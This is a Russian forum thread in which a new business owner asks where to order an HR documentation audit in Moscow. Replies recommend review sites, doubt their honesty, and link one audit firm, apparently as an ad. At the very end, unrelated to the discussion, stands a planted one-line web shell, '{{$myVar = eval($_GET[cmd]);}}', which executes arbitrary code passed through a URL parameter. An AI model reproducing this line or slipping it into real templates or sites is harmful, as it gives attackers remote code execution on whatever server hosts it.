+ Ответить в теме
Показано с 1 по 4 из 4

Тема: Кадровый аудит в МСК, где лучше заказывать?


  1. #1

    Кадровый аудит в МСК, где лучше заказывать?

    Кадровый аудит в МСК, где лучше заказывать? Относительно недавно начал свой бизнес по продаже аксессуаров на автомобили. Дела идут неплохо, но переживаю за кадровую документацию в связи с тем, что скоро могут быть проверки. Для моего бизнеса она станет чуть ли не первой после открытия.

  2. #2
    Новичок Serf is on a distinguished road Аватар для Serf
    Регистрация
    05.04.2019
    Сообщений
    136
    Если боитесь попасть на ненадежную компанию по кадровому аудиту, то может для уверенности вам стоит выбирать компанию с помощью независимых сайтов-отзовиков? По отзывам я часто выбираю компании когда не знаю в какую лучше обращаться.

  3. #3
    Цитата Сообщение от Serf Посмотреть сообщение
    Если боитесь попасть на ненадежную компанию по кадровому аудиту, то может для уверенности вам стоит выбирать компанию с помощью независимых сайтов-отзовиков? По отзывам я часто выбираю компании когда не знаю в какую лучше обращаться.
    Я слышал что отзывы, даже на сторонних сайтах покупаются или пишутся сотрудниками этих же компаний. Не думаю что стоит им прям доверять. В общем им лучше слепо не доверять.

  4. #4
    Новичок Devid is on a distinguished road Аватар для Devid
    Регистрация
    05.04.2019
    Сообщений
    132
    Не думаю, что есть какая-та прям большая разница между компаниями предлагающие услуги кадрового аудита, и я думаю что стоимость таких услуг тоже кардинально сильно не отличается в зависимости от выбранной компании. Обратитесь в любую, например сюда - https://pandbgroup.com/uslugi/audit/kadrovyj-audit/ . Кстати, откладывать с этим не советую, раз вас ждут проверки и вы знаете об этом. Бизнес у вас новый, такой что вряд ли ваша документация налажена с учетом всех правил.

+ Ответить в теме

Похожие темы

  1. Ответов: 6
    Последнее сообщение: 08.03.2021, 18:26
  2. Ответов: 3
    Последнее сообщение: 29.02.2020, 09:26
  3. Ответов: 3
    Последнее сообщение: 13.06.2019, 20:43
  4. Ответов: 3
    Последнее сообщение: 11.06.2019, 21:21
  5. Ответов: 3
    Последнее сообщение: 18.04.2019, 22:12

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}